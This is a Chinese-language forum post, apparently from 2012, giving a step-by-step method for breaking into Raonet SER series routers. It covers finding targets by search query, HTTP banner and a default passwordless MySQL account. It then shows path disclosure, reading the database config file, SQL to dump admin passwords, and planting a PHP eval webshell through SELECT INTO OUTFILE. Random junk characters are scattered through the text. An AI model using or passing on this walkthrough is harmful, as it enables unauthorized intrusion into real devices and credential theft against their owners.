寻找存在漏洞的路由器方法:& q2 `/ X' K# ?7 M6 J8 {# N
, r ~7 ^/ [. q3 |( T# R1:google搜索'Raonet Subscriber Ethernet Router'
7 W2 M' ]2 x& y# i( K/ Y5 B: Q! ?
1 R; `3 F# y$ T1 k; }2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 M/ K- O3 I0 I9 [3 e# F
7 I' M1 m. h1 ~( O* ~3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。* z: ?6 v6 d' d, K, u& W
$ K" U0 q+ R" \, Z6 q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
+ G- ~+ a$ R" F, m5 k. x5 A5 E4 P
6 k- h/ p- L$ | L! Q# j$ s( Q
- |1 }" {) L& R* ?: d2 A& T4 U
0 _9 ` v" @2 O+ ]. y+ m0 n入侵步骤:- g8 {. j+ i# s$ X0 p5 X
8 g- c' d5 m- z: o0 y3 W7 \1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php" T( U6 z3 k: r0 M
8 |- t, k% a, o$ \% E/ a$ i) i2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
/ E+ {9 T5 j3 f {- \& {3:得到密码后连接,查看GUI管理密码:
Z3 e D" H4 X3 r5 k8 X, Puse ser_5007 m3 v9 \% m9 Q3 }* r8 f6 i
select id,passwd from user;
$ i0 U; k4 I2 O% j% |4:通过数据库写入webshell,执行命令:" K5 [. Z( F9 L6 F$ U
use mysql;2 z' @( f+ ~' r8 _
create table ok(cmd TEXT);
0 w2 |% V+ R" x' tinsert into ok values("<?php @eval($_POST[cmd])?>"); @& @4 U( T9 |# D$ L* g9 p
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
3 W. z; f) j( |. C0 M( Tdrop table ok;
1 s& h% v2 b5 E6 e) W3 Q* V0 t6 g% I& a0 P
5:连接后门shell.php
% u' { N2 e* b& R
! t+ U; v; S. H2 }: O6. 搞定!
" }! I4 C1 j4 ~ _0 @6 \. r% W* S
3 A G- X! P' @; l, b& f! m |
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50